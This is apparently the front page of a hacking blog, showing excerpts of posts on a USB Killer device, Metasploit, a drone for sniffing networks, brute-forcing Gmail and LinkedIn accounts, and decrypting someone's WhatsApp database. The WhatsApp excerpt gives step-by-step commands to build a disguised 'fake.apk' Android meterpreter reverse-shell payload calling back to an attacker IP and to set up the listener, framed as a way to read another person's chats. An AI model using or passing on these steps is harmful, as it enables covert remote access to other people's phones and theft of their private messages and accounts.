Posts

Want To Fry A Laptop? Use USB Killer 2.0

Image
The Russian cybersecurity expert, Dark Purple , who created the devious USB Killer pen drive, has created a new version of the malicious hardware that can brick a device as soon as it is plugged in. In a new blog post (link in Russian), the somewhat anonymous Dark Purple described his device, simply titled USB Killer v2.0. It doesn’t install any malware on your computer once you plug it in. Instead it sends a 220-volt charge through the USB’s signal lines and destroys the computer. The original USB Killer, first revealed online back in March, administered 110 volts, which was more than enough to fry your computer anyway. USB Killer looks quite inconspicuous, too, and could be easily mistaken for an average USB drive. Dark Purple posted a short video demonstrating the USB in action, where he destroys the motherboard of a Lenovo Thinkpad X60 laptop, which he bought specifically for the test, in just a couple of seconds. As viewers can see, the USB stick looks normal, and there

Decrypt Whatsapp Database To Get Chat List

Are you curious about how to get somebody's whatsapp chat list. Just follow Credits To -> How To Decrypt Whatsapp Database. Before starting the database decryption process,first obtain remote access to android device: 1. Start terminal and type: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=81 R > fake.apk [ Lhost=Attacker IP address, Lport=local port ] This command will generate fake.apk in home directory. 2. Type: msfconsole This command will start the metasploit framework. 3. Type: use exploit/multi/handler In order to get multiple session on a single multi/handler. 4. Type: set payload android/meterpreter/reverse_tcp This will provide the reverse connection from victim to attacker computer. 5. Type: show options It will show the available options like lhost,lport 6. Set LHOST=192.168.0.2 7. Set LPORT=81 8. EXPLOIT Now Run the app created in step 1 on your android phone and you'll get a meterpreter session After getting the meterpreter session

View Websites Without Internet

Image
If you are intrested in browsing a website without internet connection so just follow this. HTTrack . is a free and open source Web crawler and offline browser, developed by Xavier Roche and licensed under the GNU General Public License Version 3. HTTrack allows users to download World Wide Web sites from the Internet to a local computer.By default, HTTrack arranges the downloaded site by the original site's relative link-structure. The downloaded (or "mirrored") website can be browsed by opening a page of the site in a browser. HTTrack uses a Web crawler to download a website. Some parts of the website may not be downloaded by default due to the robots exclusion protocol unless disabled during the program. HTTrack can follow links that are generated with basic JavaScript and inside Applets or Flash, but not complex links (generated using functions or expressions) or server-side image maps. Go to the below link and download for Windows, Linux, Android. To Downlo

A drone that can steal data just by hovering above you

‘Aerial Assault’ Drone Helps Hackers Penetrate Internet Networks by hovering above If you are a hacker and want to infiltrate Internet networks in areas out of reach, you can try this new drone. Aerial Assault drone is a unmanned aerial vehicle which is available for $2,500 and has the ability to hover about the target network, sniff vulnerabilities in the PCs below and report back to the owner. http://www.techworm.net/2015/08/a-drone-that-can-steal-data-just-by-hovering-above-you.html Check the link for complete Information.

How To Exploit Machines With Metasploit Armitage and msfconsole

Image
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the open source[2] Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research. The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework. The basic steps for exploiting a system using the Framework include: 1. Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and Mac OS X systems are included); 2. Optionally checking whether the intended target system is susceptible to the chosen exploit; 3. Choosing and configuring a payload (code that will be

Crack Gmail and LinkedIn Account Using Brute Force Attack With Simple Python Script

Image
Hello Friends, I have written a simple python script with which you can crack Gmail or LinkedIn account by simpling performing Brute Force Attack In cryptography, a brute-force attack consists of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. Alternatively, the attacker can attempt to guess the key which is typically created from the password using a key derivation function. This is known as an exhaustive key search. When password guessing, this method is very fast when used to check all short passwords, but for longer passwords other methods such as the dictionary attack are used because a brute-force search takes too long. Longer passwords, passphrases and keys have more possible values, making them exponentially more difficult to crack than shorter ones. Software that performs brute-force attacks Aircrack-ng

Ethical Hacking....?

Image
Ethical Hacking , also known as penetration testing, intrusion testing, or red teaming, is the controversial act of locating weaknesses and vulnerabilities of computer and information systems by duplicating the intent and actions of malicious hackers. An Ethical Hacker , also known as a whitehat hacker, or simply a whitehat, is a security professional who applies their hacking skills for defensive purposes on behalf of the owners of information systems. Nowadays, certiļ¬ed ethical hackers are among the most sought after information security employees in large organizations such as Wipro, Infosys, IBM, Airtel and Reliance among others. Definition: Ethical hacking refers to the act of locating weaknesses and vulnerabilities of computer and information systems by duplicating the intent and actions of malicious hackers. Ethical hacking is also known as penetration testing, intrusion testing, or red teaming. An ethical hacker is a security professional who applies their hacking skills